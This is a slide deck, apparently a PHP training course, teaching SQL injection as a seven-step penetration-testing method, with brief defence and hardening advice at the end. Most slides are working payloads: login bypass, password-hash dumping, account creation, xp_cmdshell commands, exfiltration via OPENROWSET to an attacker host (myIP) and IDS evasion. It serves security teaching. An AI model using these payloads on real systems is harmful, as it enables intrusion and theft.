SlideShare une entreprise Scribd logo
1  sur  90
Télécharger pour lire hors ligne
PHP - Introduction to Advanced SQL
Introduction toIntroduction to
Advanced SQLAdvanced SQL
What is SQL?What is SQL?
• SQL stands for Structured Query Language
• Allows us to access a database
• ANSI and ISO standard computer language
o The most current standard is SQL99
• SQL can:
o execute queries against a database
o retrieve data from a database
o insert new records in a database
o delete records from a database
o update records in a database
SQL is a Standard - but...SQL is a Standard - but...
• There are many different versions of the SQL
language
• They support the same major keywords in a similar
manner (such as SELECT, UPDATE, DELETE, INSERT,
WHERE, and others).
• Most of the SQL database programs also have their
own proprietary extensions in addition to the SQL
standard!
SQL Database TablesSQL Database Tables
• A relational database contains one or more tables
identified each by a name
• Tables contain records (rows) with data
• For example, the following table is called "users" and
contains data distributed in rows and columns:
userID Name LastName Login Password
1 John Smith jsmith hello
2 Adam Taylor adamt qwerty
3 Daniel Thompson dthompson dthompson
SQL QueriesSQL Queries
• With SQL, we can query a database and have a
result set returned
• Using the previous table, a query like this:
SELECT LastName
FROM users
WHERE UserID = 1;
• Gives a result set like this:
LastName
--------------
Smith
SQL Data ManipulationSQL Data Manipulation
Language (DML)Language (DML)
• SQL includes a syntax to update, insert, and delete
records:
o SELECT - extracts data
o UPDATE - updates data
o INSERT INTO - inserts new data
o DELETE - deletes data
SQL Data DefinitionSQL Data Definition
Language (DDL)Language (DDL)
• The Data Definition Language (DDL) part of SQL permits:
o Database tables to be created or deleted
o Define indexes (keys)
o Specify links between tables
o Impose constraints between database tables
• Some of the most commonly used DDL statements in SQL
are:
o CREATE TABLE - creates a new database table
o ALTER TABLE - alters (changes) a database table
o DROP TABLE - deletes a database table
MetadataMetadata
• Almost all SQL databases are based on the RDBM
(Relational Database Model)
• One important fact for SQL Injection
o Amongst Codd's 12 rules for a Truly Relational Database System:
4. Metadata (data about the database) must be stored in the
database just as regular data is
o Therefore, database structure can also be read and altered with SQL
queries
What is SQL Injection?What is SQL Injection?
The ability to inject SQL commands
into the database engine
through an existing application
How common is it?How common is it?
• It is probably the most common Website
vulnerability today!
• It is a flaw in "web application" development,
it is not a DB or web server problem
o Most programmers are still not aware of this problem
o A lot of the tutorials & demo “templates” are vulnerable
o Even worse, a lot of solutions posted on the Internet are
not good enough
• In our pen tests over 60% of our clients turn out to be
vulnerable to SQL Injection
Vulnerable ApplicationsVulnerable Applications
• Almost all SQL databases and programming languages are
potentially vulnerable
o MS SQL Server, Oracle, MySQL, Postgres, DB2, MS Access, Sybase,
Informix, etc
• Accessed through applications developed using:
o Perl and CGI scripts that access databases
o ASP, JSP, PHP
o XML, XSL and XSQL
o Javascript
o VB, MFC, and other ODBC-based tools and APIs
o DB specific Web-based applications and API’s
o Reports and DB Applications
o 3 and 4GL-based languages (C, OCI, Pro*C, and COBOL)
o many more
How does SQL InjectionHow does SQL Injection
work?work?
Common vulnerable login query
SELECT * FROM users
WHERE login = 'victor'
AND password = '123'
(If it returns something then login!)
ASP/MS SQL Server login syntax
var sql = "SELECT * FROM users
WHERE login = '" + formusr +
"' AND password = '" + formpwd + "'";
Injecting through StringsInjecting through Strings
formusr = ' or 1=1 – –
formpwd = anything
Final query would look like this:
SELECT * FROM users
WHERE username = ' ' or 1=1
– – AND password = 'anything'
The power of 'The power of '
• It closes the string parameter
• Everything after is considered part of the SQL
command
• Misleading Internet suggestions include:
o Escape it! : replace ' with ' '
• String fields are very common but there are other
types of fields:
o Numeric
o Dates
If it were numeric?If it were numeric?
SELECT * FROM clients
WHERE account = 12345678
AND pin = 1111
PHP/MySQL login syntax
$sql = "SELECT * FROM clients WHERE " .
"account = $formacct AND " .
"pin = $formpin";
Injecting Numeric FieldsInjecting Numeric Fields
$formacct = 1 or 1=1 #
$formpin = 1111
Final query would look like this:
SELECT * FROM clients
WHERE account = 1 or 1=1
# AND pin = 1111
SQL Injection CharactersSQL Injection Characters
• ' or " character String Indicators
• -- or # single-line comment
• /*…*/ multiple-line comment
• + addition, concatenate (or space in url)
• || (double pipe) concatenate
• % wildcard attribute indicator
• ?Param1=foo&Param2=bar URL Parameters
• PRINT useful as non transactional command
• @variablelocal variable
• @@variable global variable
• waitfor delay '0:0:10' time delay
MethodologyMethodology
SQL Injection Testing MethodologySQL Injection Testing Methodology
1) Input Validation
2) Info. Gathering
6) OS Cmd Prompt
7) Expand Influence
4) Extracting Data
3) 1=1 Attacks 5) OS Interaction
1) Input Validation1) Input Validation
2) Info. Gathering
3) 1=1 Attacks 5) OS Interaction
6) OS Cmd Prompt4) Extracting Data
7) Expand Influence
1) Input Validation
Discovery ofDiscovery of
VulnerabilitiesVulnerabilities
• Vulnerabilities can be anywhere, we check all
entry points:
o Fields in web forms
o Script parameters in URL query strings
o Values stored in cookies or hidden fields
• By "fuzzing" we insert into every one:
o Character sequence: ' " ) # || + >
o SQL reserved words with white space delimiters
• %09select (tab%09, carriage return%13, linefeed%10 and space%32
with and, or, update, insert, exec, etc)
o Delay query ' waitfor delay '0:0:10'--
2) Information Gathering2) Information Gathering
2) Info. Gathering
3) 1=1 Attacks 5) OS Interaction
6) OS Cmd Prompt4) Extracting Data
7) Expand Influence
1) Input Validation
2) Information Gathering2) Information Gathering
• We will try to find out the following:
a) Output mechanism
b) Understand the query
c) Determine database type
d) Find out user privilege level
e) Determine OS interaction level
a) Exploring Outputa) Exploring Output
MechanismsMechanisms
1. Using query result sets in the web application
2. Error Messages
o Craft SQL queries that generate specific types of error
messages with valuable info in them
1. Blind SQL Injection
o Use time delays or error signatures to determine extract
information
o Almost the same things can be done but Blind Injection is
much slower and more difficult
1. Other mechanisms
o e-mail, SMB, FTP, TFTP
Extracting informationExtracting information
through Error Messagesthrough Error Messages
• Grouping Error
 ' group by columnnames having 1=1 - -
• Type Mismatch
o ' union select 1,1,'text',1,1,1 - -
o ' union select 1,1, bigint,1,1,1 - -
• Where 'text' or bigint are being united into an int column
o In DBs that allow subqueries, a better way is:
• ' and 1 in (select 'text' ) - -
o In some cases we may need to CAST or CONVERT our data
to generate the error messages
Blind InjectionBlind Injection
• We can use different known outcomes
o ' and condition and '1'='1
• Or we can use if statements
o '; if condition waitfor delay '0:0:5' --
o '; union select if( condition , benchmark (100000,
sha1('test')), 'false' ),1,1,1,1;
• Additionally, we can run all types of queries but with
no debugging information!
• We get yes/no responses only
o We can extract ASCII a bit at a time...
o Very noisy and time consuming but possible with
automated tools like SQueaL
b) Understanding theb) Understanding the
QueryQuery
• The query can be:
o SELECT
o UPDATE
o EXEC
o INSERT
o Or something more complex
• Context helps
o What is the form or page trying to do with our input?
o What is the name of the field, cookie or parameter?
SELECT StatementSELECT Statement
• Most injections will land in the middle of a SELECT
statement
• In a SELECT clause we almost always end up in the
WHERE section:
o SELECT *
• FROM table
• WHERE x = 'normalinput' group by x having 1=1 --
• GROUP BY x
• HAVING x = y
• ORDER BY x
UPDATE statementUPDATE statement
• In a change your password section of an app we
may find the following
o UPDATE users
SET password = 'new password'
WHERE login = logged.user
AND password = 'old password'
o If you inject in new password and comment the rest, you end up
changing every password in the table!
Determining a SELECTDetermining a SELECT
Query StructureQuery Structure
1. Try to replicate an error free navigation
 Could be as simple as ' and '1' = '1
 Or ' and '1' = '2
1. Generate specific errors
 Determine table and column names
' group by columnnames having 1=1 --
 Do we need parenthesis? Is it a subquery?
Is it a stored procedure?Is it a stored procedure?
• We use different injections to determine what we
can or cannot do
o ,@variable
o ?Param1=foo&Param2=bar
o PRINT
o PRINT @@variable
Tricky QueriesTricky Queries
• When we are in a part of a subquery or begin - end
statement
o We will need to use parenthesis to get out
o Some functionality is not available in subqueries (for
example group by, having and further subqueries)
o In some occasions we will need to add an END
• When several queries use the input
o We may end up creating different errors in different
queries, it gets confusing!
• An error generated in the query we are interrupting
may stop execution of our batch queries
• Some queries are simply not escapable!
c) Determine Databasec) Determine Database
Engine TypeEngine Type
• Most times the error messages will let us know what
DB engine we are working with
o ODBC errors will display database type as part of the driver information
• If we have no ODBC error messages:
o We make an educated guess based on the Operating System and Web
Server
o Or we use DB-specific characters, commands or stored procedures that
will generate different error messages
Some differencesSome differences
MS SQL
T-SQL
MySQL Access
Oracle
PL/SQL
DB2
Postgres
PL/pgSQL
Concatenate
Strings
' '+' '
concat ("
", " ")
" "&" " ' '||' ' " "+" " ' '||' '
Null
replace
Isnull() Ifnull() Iff(Isnull()) Ifnull() Ifnull() COALESCE()
Position CHARINDEX LOCATE() InStr() InStr() InStr() TEXTPOS()
Op Sys
interaction
xp_cmdshell
select into
outfile /
dumpfile
#date# utf_file
import
from
export to
Call
Cast Yes No No No Yes Yes
MoreMore differencesdifferences……
MS SQL MySQL Access Oracle DB2 Postgres
UNION Y Y Y Y Y Y
Subselects Y
N 4.0
Y 4.1
N Y Y Y
Batch Queries Y N* N N N Y
Default stored
procedures
Many N N Many N N
Linking DBs Y Y N Y Y N
d) Finding out userd) Finding out user
privilege levelprivilege level
• There are several SQL99 built-in scalar functions that
will work in most SQL implementations:
o user or current_user
o session_user
o system_user
• ' and 1 in (select user ) --
• '; if user ='dbo' waitfor delay '0:0:5 '--
• ' union select if( user() like 'root@%',
benchmark(50000,sha1('test')), 'false' );
DB AdministratorsDB Administrators
• Default administrator accounts include:
o sa, system, sys, dba, admin, root and many others
• In MS SQL they map into dbo:
o The dbo is a user that has implied permissions to perform all
activities in the database.
o Any member of the sysadmin fixed server role who uses a
database is mapped to the special user inside each
database called dbo.
o Also, any object created by any member of the sysadmin
fixed server role belongs to dbo automatically.
3) 1=1 Attacks3) 1=1 Attacks
1) Input Validation
5) OS Interaction
6) OS Cmd Prompt4) Extracting Data
7) Expand Influence
2) Info. Gathering
3) 1=1 Attacks
Discover DB structureDiscover DB structure
• Determine table and column names
' group by columnnames having 1=1 --
• Discover column name types
' union select sum(columnname ) from tablename
--
• Enumerate user defined tables
' and 1 in (select min(name) from sysobjects where
xtype = 'U' and name > '.') --
Enumerating tableEnumerating table
columns in different DBscolumns in different DBs
• MS SQL
o SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects
WHERE name = 'tablename ')
o sp_columns tablename (this stored procedure can be used instead)
• MySQL
o show columns from tablename
• Oracle
o SELECT * FROM all_tab_columns
WHERE table_name='tablename '
• DB2
o SELECT * FROM syscat.columns
WHERE tabname= 'tablename '
• Postgres
o SELECT attnum,attname from pg_class, pg_attribute
WHERE relname= 'tablename '
AND pg_class.oid=attrelid AND attnum > 0
All tables and columns inAll tables and columns in
one queryone query
• ' union select 0, sysobjects.name + ': ' +
syscolumns.name + ': ' + systypes.name, 1, 1, '1', 1, 1,
1, 1, 1 from sysobjects, syscolumns, systypes where
sysobjects.xtype = 'U' AND sysobjects.id =
syscolumns.id AND syscolumns.xtype =
systypes.xtype --
Database EnumerationDatabase Enumeration
• In MS SQL Server, the databases can be queried
with master..sysdatabases
o Different databases in Server
• ' and 1 in (select min(name ) from master.dbo.sysdatabases where
name >'.' ) --
o File location of databases
• ' and 1 in (select min(filename ) from master.dbo.sysdatabases where
filename >'.' ) --
System TablesSystem Tables
• Oracle
o SYS.USER_OBJECTS
o SYS.TAB
o SYS.USER_TEBLES
o SYS.USER_VIEWS
o SYS.ALL_TABLES
o SYS.USER_TAB_COLUMNS
o SYS.USER_CATALOG
• MySQL
o mysql.user
o mysql.host
o mysql.db
• MS Access
o MsysACEs
o MsysObjects
o MsysQueries
o MsysRelationships
• MS SQL Server
o sysobjects
o syscolumns
o systypes
o sysdatabases
4) Extracting Data4) Extracting Data
4) Extracting Data
1) Input Validation
5) OS Interaction
6) OS Cmd Prompt
7) Expand Influence
2) Info. Gathering
3) 1=1 Attacks
Password grabbingPassword grabbing
• Grabbing username and passwords from a User
Defined table
o '; begin declare @var varchar(8000)
set @var=':' select @var=@var+' '+login+'/'+password+' '
from users where login>@var
select @var as var into temp end --
o ' and 1 in (select var from temp) --
o ' ; drop table temp --
Create DB AccountsCreate DB Accounts
MS SQL
o exec sp_addlogin 'victor', 'Pass123'
o exec sp_addsrvrolemember 'victor', 'sysadmin'
MySQL
o INSERT INTO mysql.user (user, host, password) VALUES ('victor', 'localhost',
PASSWORD('Pass123'))
Access
o CREATE USER victor IDENTIFIED BY 'Pass123'
Postgres (requires UNIX account)
o CREATE USER victor WITH PASSWORD 'Pass123'
Oracle
o CREATE USER victor IDENTIFIED BY Pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
o GRANT CONNECT TO victor;
o GRANT RESOURCE TO victor;
Grabbing MS SQL ServerGrabbing MS SQL Server
HashesHashes
• An easy query:
o SELECT name, password FROM sysxlogins
• But, hashes are varbinary
o To display them correctly through an error message we need to Hex
them
o And then concatenate all
o We can only fit 70 name/password pairs in a varchar
o We can only see 1 complete pair at a time
• Password field requires dbo access
o With lower privileges we can still recover user names and brute force
the password
What do we do?What do we do?
• The hashes are extracted using
o SELECT password FROM master..sysxlogins
• We then hex each hash
begin @charvalue='0x', @i=1, @length=datalength(@binvalue),
@hexstring = '0123456789ABCDEF'
while (@i<=@length) BEGIN
declare @tempint int, @firstint int, @secondint int
select @tempint=CONVERT(int,SUBSTRING(@binvalue,@i,1))
select @firstint=FLOOR(@tempint/16)
select @secondint=@tempint - (@firstint*16)
select @charvalue=@charvalue + SUBSTRING (@hexstring,@firstint+1,1)
+ SUBSTRING (@hexstring, @secondint+1, 1)
select @i=@i+1 END
• And then we just cycle through all passwords
Extracting SQL HashesExtracting SQL Hashes
• It is a long statement
'; begin declare @var varchar(8000), @xdate1 datetime, @binvalue
varbinary(255), @charvalue varchar(255), @i int, @length int, @hexstring
char(16) set @var=':' select @xdate1=(select min(xdate1) from
master.dbo.sysxlogins where password is not null) begin while @xdate1 <=
(select max(xdate1) from master.dbo.sysxlogins where password is not null)
begin select @binvalue=(select password from master.dbo.sysxlogins where
xdate1=@xdate1), @charvalue = '0x', @i=1, @length=datalength(@binvalue),
@hexstring = '0123456789ABCDEF' while (@i<=@length) begin declare
@tempint int, @firstint int, @secondint int select @tempint=CONVERT(int,
SUBSTRING(@binvalue,@i,1)) select @firstint=FLOOR(@tempint/16) select
@secondint=@tempint - (@firstint*16) select @charvalue=@charvalue +
SUBSTRING (@hexstring,@firstint+1,1) + SUBSTRING (@hexstring, @secondint+1,
1) select @i=@i+1 end select @var=@var+' | '+name+'/'+@charvalue from
master.dbo.sysxlogins where xdate1=@xdate1 select @xdate1 = (select
isnull(min(xdate1),getdate()) from master..sysxlogins where xdate1>@xdate1
and password is not null) end select @var as x into temp end end --
Extract hashes through error messagesExtract hashes through error messages
• ' and 1 in (select x from temp) --
• ' and 1 in (select substring (x, 256, 256) from temp) --
• ' and 1 in (select substring (x, 512, 256) from temp) --
• etc…
• ' drop table temp --
Brute forcing PasswordsBrute forcing Passwords
• Passwords can be brute forced by using the attacked server
to do the processing
• SQL Crack Script
o create table tempdb..passwords( pwd varchar(255) )
o bulk insert tempdb..passwords from 'c:temppasswords.txt'
o select name, pwd from tempdb..passwords inner join sysxlogins
on (pwdcompare( pwd, sysxlogins.password, 0 ) = 1) union select
name, name from sysxlogins where (pwdcompare( name,
sysxlogins.password, 0 ) = 1) union select sysxlogins.name, null
from sysxlogins join syslogins on sysxlogins.sid=syslogins.sid where
sysxlogins.password is null and syslogins.isntgroup=0 and
syslogins.isntuser=0
o drop table tempdb..passwords
Transfer DB structure andTransfer DB structure and
datadata
• Once network connectivity has been tested
• SQL Server can be linked back to the attacker's DB
by using OPENROWSET
• DB Structure is replicated
• Data is transferred
• It can all be done by connecting to a remote port
80!
Create Identical DBCreate Identical DB
StructureStructure
'; insert into
OPENROWSET('SQLoledb',
'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select
* from mydatabase..hacked_sysdatabases')
select * from master.dbo.sysdatabases --
'; insert into
OPENROWSET('SQLoledb',
'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select
* from mydatabase..hacked_sysdatabases')
select * from user_database.dbo.sysobjects --
'; insert into
OPENROWSET('SQLoledb',
'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',
'select * from mydatabase..hacked_syscolumns')
select * from user_database.dbo.syscolumns --
Transfer DBTransfer DB
'; insert into
OPENROWSET('SQLoledb',
'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',
'select * from mydatabase..table1')
select * from database..table1 --
'; insert into
OPENROWSET('SQLoledb',
'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',
'select * from mydatabase..table2')
select * from database..table2 --
5) OS Interaction5) OS Interaction
5) OS Interaction
6) OS Cmd Prompt
7) Expand Influence
1) Input Validation
2) Info. Gathering
3) 1=1 Attacks
4) Extracting Data
Interacting with the OSInteracting with the OS
• Two ways to interact with the OS:
1. Reading and writing system files from disk
• Find passwords and configuration files
• Change passwords and configuration
• Execute commands by overwriting initialization or configuration
files
1. Direct command execution
• We can do anything
• Both are restricted by the database's running
privileges and permissions
MySQL OS InteractionMySQL OS Interaction
• MySQL
o LOAD_FILE
• ' union select 1,load_file('/etc/passwd'),1,1,1;
o LOAD DATA INFILE
• create table temp( line blob );
• load data infile '/etc/passwd' into table temp;
• select * from temp;
o SELECT INTO OUTFILE
MS SQL OS InteractionMS SQL OS Interaction
• MS SQL Server
o '; exec master..xp_cmdshell 'ipconfig > test.txt' --
o '; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp
FROM 'test.txt' --
o '; begin declare @data varchar(8000) ; set @data='| ' ; select
@data=@data+txt+' | ' from tmp where txt<@data ; select
@data as x into temp end --
o ' and 1 in (select substring(x,1,256) from temp) --
o '; declare @var sysname; set @var = 'del test.txt'; EXEC
master..xp_cmdshell @var; drop table temp; drop table tmp --
ArchitectureArchitecture
• To keep in mind always!
• Our injection most times will be executed on a
different server
• The DB server may not even have Internet access
Web Server
Web
Page
Access
Database Server
Injected SQL
Execution!
Application Server
Input
Validation
Flaw
Assessing NetworkAssessing Network
ConnectivityConnectivity
• Server name and configuration
o ' and 1 in (select @@servername ) --
o ' and 1 in (select srvname from master..sysservers ) --
o NetBIOS, ARP, Local Open Ports, Trace route?
• Reverse connections
o nslookup, ping
o ftp, tftp, smb
• We have to test for firewall and proxies
Gathering IP informationGathering IP information
through reverse lookupsthrough reverse lookups
• Reverse DNS
o '; exec master..xp_cmdshell 'nslookup a.com MyIP' --
• Reverse Pings
o '; exec master..xp_cmdshell 'ping MyIP' --
• OPENROWSET
o '; select * from OPENROWSET( 'SQLoledb', 'uid=sa; pwd=Pass123;
Network=DBMSSOCN; Address=MyIP,80;',
'select * from table')
Network ReconnaissanceNetwork Reconnaissance
• Using the xp_cmdshell all the following can be
executed:
o Ipconfig /all
o Tracert myIP
o arp -a
o nbtstat -c
o netstat -ano
o route print
Network ReconnaissanceNetwork Reconnaissance
Full QueryFull Query
• '; declare @var varchar(256); set @var = ' del test.txt && arp -a
>> test.txt && ipconfig /all >> test.txt && nbtstat -c >> test.txt &&
netstat -ano >> test.txt && route print >> test.txt && tracert -w 10
-h 10 google.com >> test.txt'; EXEC master..xp_cmdshell @var --
• '; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM
'test.txt' --
• '; begin declare @data varchar(8000) ; set @data=': ' ; select
@data=@data+txt+' | ' from tmp where txt<@data ; select
@data as x into temp end --
• ' and 1 in (select substring(x,1,255) from temp) --
• '; declare @var sysname; set @var = 'del test.txt'; EXEC
master..xp_cmdshell @var; drop table temp; drop table tmp --
6) OS Cmd Prompt6) OS Cmd Prompt
7) Expand Influence
3) 1=1 Attacks
4) Extracting Data
1) Input Validation
2) Info. Gathering
5) OS Interaction
6) OS Cmd Prompt
Jumping to the OSJumping to the OS
• Linux based MySQL
o ' union select 1, (load_file('/etc/passwd')),1,1,1;
• MS SQL Windows Password Creation
o '; exec xp_cmdshell 'net user /add victor Pass123'--
o '; exec xp_cmdshell 'net localgroup /add administrators victor' --
• Starting Services
o '; exec master..xp_servicecontrol 'start','FTP Publishing' --
Using ActiveXUsing ActiveX
Automation ScriptsAutomation Scripts
Speech example
o '; declare @o int, @var int
exec sp_oacreate 'speech.voicetext', @o out
exec sp_oamethod @o, 'register', NULL, 'x', 'x'
exec sp_oasetproperty @o, 'speed', 150
exec sp_oamethod @o, 'speak', NULL, 'warning, your sequel server has
been hacked!', 1
waitfor delay '00:00:03' --
Retrieving VNCRetrieving VNC
Password from RegistryPassword from Registry
• '; declare @out binary(8)
exec master..xp_regread
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWAREORLWinVNC3Default',
@value_name='Password',
@value = @out output
select cast(@out as bigint) as x into TEMP--
• ' and 1 in (select cast(x as varchar) from temp) --
7) Expand Influence7) Expand Influence
7) Expand Influence
3) 1=1 Attacks
4) Extracting Data
1) Input Validation
2) Info. Gathering
5) OS Interaction
6) OS Cmd Prompt
Hopping into other DBHopping into other DB
ServersServers
• Finding linked servers in MS SQL
o select * from sysservers
• Using the OPENROWSET command hopping to
those servers can easily be achieved
• The same strategy we saw earlier with using
OPENROWSET for reverse connections
Linked ServersLinked Servers
'; insert into
OPENROWSET('SQLoledb',
'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',
'select * from mydatabase..hacked_sysservers')
select * from master.dbo.sysservers
'; insert into
OPENROWSET('SQLoledb',
'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',
'select * from mydatabase..hacked_linked_sysservers')
select * from LinkedServer.master.dbo.sysservers
'; insert into
OPENROWSET('SQLoledb',
'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',
'select * from mydatabase..hacked_linked_sysdatabases')
select * from LinkedServer.master.dbo.sysdatabases
Executing through storedExecuting through stored
procedures remotelyprocedures remotely
• If the remote server is configured to only allow stored procedure
execution, this changes would be made:
insert into
OPENROWSET('SQLoledb',
'uid=sa; pwd=Pass123; Network=DBMSSOCN; Address=myIP,80;', 'select *
from mydatabase..hacked_sysservers')
exec Linked_Server.master.dbo.sp_executesql N'select * from
master.dbo.sysservers'
insert into
OPENROWSET('SQLoledb',
'uid=sa; pwd=Pass123; Network=DBMSSOCN; Address=myIP,80;', 'select *
from mydatabase..hacked_sysdatabases')
exec Linked_Server.master.dbo.sp_executesql N'select * from
master.dbo.sysdatabases'
Uploading files throughUploading files through
reverse connectionreverse connection
• '; create table AttackerTable (data text) --
• '; bulk insert AttackerTable --
from 'pwdump2.exe' with (codepage='RAW')
• '; exec master..xp_regwrite
'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftMSSQLServ
erClientConnectTo',' MySrvAlias','REG_SZ','DBMSSOCN,
MyIP, 80' --
• '; exec xp_cmdshell 'bcp "select * from AttackerTable"
queryout pwdump2.exe -c -Craw -SMySrvAlias -Uvictor
-PPass123' --
Uploading files throughUploading files through
SQL InjectionSQL Injection
• If the database server has no Internet connectivity,
files can still be uploaded
• Similar process but the files have to be hexed and
sent as part of a query string
• Files have to be broken up into smaller pieces (4,000
bytes per piece)
Example of SQL injectionExample of SQL injection
file uploadingfile uploading
• The whole set of queries is lengthy
• You first need to inject a stored procedure to
convert hex to binary remotely
• You then need to inject the binary as hex in 4000
byte chunks
o ' declare @hex varchar(8000), @bin varchar(8000) select @hex =
'4d5a900003000…
 8000 hex chars …0000000000000000000' exec master..sp_hex2bin
@hex, @bin output ; insert master..pwdump2 select @bin --
• Finally you concatenate the binaries and dump the
file to disk.
Evasion TechniquesEvasion Techniques
• Input validation circumvention and IDS Evasion
techniques are very similar
• Snort based detection of SQL Injection is partially
possible but relies on "signatures"
• Signatures can be evaded easily
• Input validation, IDS detection AND strong
database and OS hardening must be used together
IDS Signature EvasionIDS Signature Evasion
Evading ' OR 1=1 signature
• ' OR 'unusual' = 'unusual'
• ' OR 'something' = 'some'+'thing'
• ' OR 'text' = N'text'
• ' OR 'something' like 'some%'
• ' OR 2 > 1
• ' OR 'text' > 't'
• ' OR 'whatever' IN ('whatever')
• ' OR 2 BETWEEN 1 AND 3
Input validationInput validation
• Some people use PHP addslashes() function to
escape characters
o single quote (')
o double quote (")
o backslash ()
o NUL (the NULL byte)
• This can be easily evaded by using replacements
for any of the previous characters in a numeric field
Evasion andEvasion and
CircumventionCircumvention
• IDS and input validation can be circumvented by
encoding
• Some ways of encoding parameters
o URL encoding
o Unicode/UTF-8
o Hex enconding
o char() function
MySQL Input ValidationMySQL Input Validation
Circumvention usingCircumvention using
Char()Char()
• Inject without quotes (string = "%"):
o ' or username like char(37);
• Inject without quotes (string = "root"):
o ' union select * from users where login = char(114,111,111,116);
• Load files in unions (string = "/etc/passwd"):
o ' union select 1,
(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
• Check for existing files (string = "n.ext"):
o ' and
1=( if( (load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
IDS Signature EvasionIDS Signature Evasion
using white spacesusing white spaces
• UNION SELECT signature is different to
• UNION SELECT
• Tab, carriage return, linefeed or several
white spaces may be used
• Dropping spaces might work even better
o 'OR'1'='1' (with no spaces) is correctly interpreted by some of the friendlier
SQL databases
IDS Signature EvasionIDS Signature Evasion
using commentsusing comments
• Some IDS are not tricked by white spaces
• Using comments is the best alternative
o /* … */ is used in SQL99 to delimit multirow comments
o UNION/**/SELECT/**/
o '/**/OR/**/1/**/=/**/1
o This also allows to spread the injection through multiple fields
• USERNAME: ' or 1/*
• PASSWORD: */ =1 --
IDS Signature EvasionIDS Signature Evasion
using string concatenationusing string concatenation
• In MySQL it is possible to separate instructions with
comments
o UNI/**/ON SEL/**/ECT
• Or you can concatenate text and use a DB specific
instruction to execute
o Oracle
• '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
o MS SQL
• '; EXEC ('SEL' + 'ECT US' + 'ER')
IDS and Input ValidationIDS and Input Validation
Evasion using variablesEvasion using variables
• Yet another evasion technique allows for the definition
of variables
o ; declare @x nvarchar(80); set @x = N'SEL' + N'ECT US' + N'ER');
o EXEC (@x)
o EXEC SP_EXECUTESQL @x
• Or even using a hex value
o ; declare @x varchar(80); set @x =
0x73656c65637420404076657273696f6e; EXEC (@x)
o This statement uses no single quotes (')
SQL Injection DefenseSQL Injection Defense
• It is quite simple: input validation
• The real challenge is making best practices
consistent through all your code
o Enforce "strong design" in new applications
o You should audit your existing websites and source code
• Even if you have an air tight design, harden your
servers
Strong DesignStrong Design
• Define an easy "secure" path to querying data
o Use stored procedures for interacting with database
o Call stored procedures through a parameterized API
o Validate all input through generic routines
o Use the principle of "least privilege"
• Define several roles, one for each kind of query
Input ValidationInput Validation
• Define data types for each field
o Implement stringent "allow only good" filters
• If the input is supposed to be numeric, use a numeric variable in your
script to store it
o Reject bad input rather than attempting to escape or modify it
o Implement stringent "known bad" filters
• For example: reject "select", "insert", "update", "shutdown", "delete",
"drop", "--", "'"
Harden the ServerHarden the Server
1. Run DB as a low-privilege user account
2. Remove unused stored procedures and
functionality or restrict access to administrators
3. Change permissions and remove "public" access
to system objects
4. Audit password strength for all user accounts
5. Remove pre-authenticated linked servers
6. Remove unused network protocols
7. Firewall the server so that only trusted clients can
connect to it (typically only: administrative
network, web server and backup server)
Detection and DissuasionDetection and Dissuasion
• You may want to react to SQL injection attempts
by:
o Logging the attempts
o Sending email alerts
o Blocking the offending IP
o Sending back intimidating error messages:
• "WARNING: Improper use of this application has been
detected. A possible attack was identified. Legal actions will
be taken."
• Check with your lawyers for proper wording
• This should be coded into your validation scripts
ThankThank You !!!You !!!
For More Information click below link:
Follow Us on:
http://
vibranttechnologies.co.in/php-classes-in-mumbai.html

Contenu connexe

Tendances

Intro to T-SQL – 2nd session
Intro to T-SQL – 2nd sessionIntro to T-SQL – 2nd session
Intro to T-SQL – 2nd sessionMedhat Dawoud
 
C# Advanced L03-XML+LINQ to XML
C# Advanced L03-XML+LINQ to XMLC# Advanced L03-XML+LINQ to XML
C# Advanced L03-XML+LINQ to XMLMohammad Shaker
 
Transforming xml with XSLT
Transforming  xml with XSLTTransforming  xml with XSLT
Transforming xml with XSLTMalintha Adikari
 
SQL/XML on Oracle
SQL/XML on OracleSQL/XML on Oracle
SQL/XML on Oracletorp42
 
CSharp Advanced L05-Attributes+Reflection
CSharp Advanced L05-Attributes+ReflectionCSharp Advanced L05-Attributes+Reflection
CSharp Advanced L05-Attributes+ReflectionMohammad Shaker
 
XML on SQL Server
XML on SQL ServerXML on SQL Server
XML on SQL Servertorp42
 
Querydsl fin jug - june 2012
Querydsl   fin jug - june 2012Querydsl   fin jug - june 2012
Querydsl fin jug - june 2012Timo Westkämper
 
eXtensible Markup Language (XML)
eXtensible Markup Language (XML)eXtensible Markup Language (XML)
eXtensible Markup Language (XML)Serhii Kartashov
 
Introduction to XSLT
Introduction to XSLTIntroduction to XSLT
Introduction to XSLTMahmoud Allam
 
Michael Bayer Introduction to SQLAlchemy @ Postgres Open
Michael Bayer Introduction to SQLAlchemy @ Postgres OpenMichael Bayer Introduction to SQLAlchemy @ Postgres Open
Michael Bayer Introduction to SQLAlchemy @ Postgres OpenPostgresOpen
 
Extracting data from xml
Extracting data from xmlExtracting data from xml
Extracting data from xmlKumar
 
JavaParser - A tool to generate, analyze and refactor Java code
JavaParser - A tool to generate, analyze and refactor Java codeJavaParser - A tool to generate, analyze and refactor Java code
JavaParser - A tool to generate, analyze and refactor Java codeFederico Tomassetti
 

Tendances (20)

Database programming
Database programmingDatabase programming
Database programming
 
Intro to T-SQL – 2nd session
Intro to T-SQL – 2nd sessionIntro to T-SQL – 2nd session
Intro to T-SQL – 2nd session
 
XSLT presentation
XSLT presentationXSLT presentation
XSLT presentation
 
Querydsl overview 2014
Querydsl overview 2014Querydsl overview 2014
Querydsl overview 2014
 
C# Advanced L03-XML+LINQ to XML
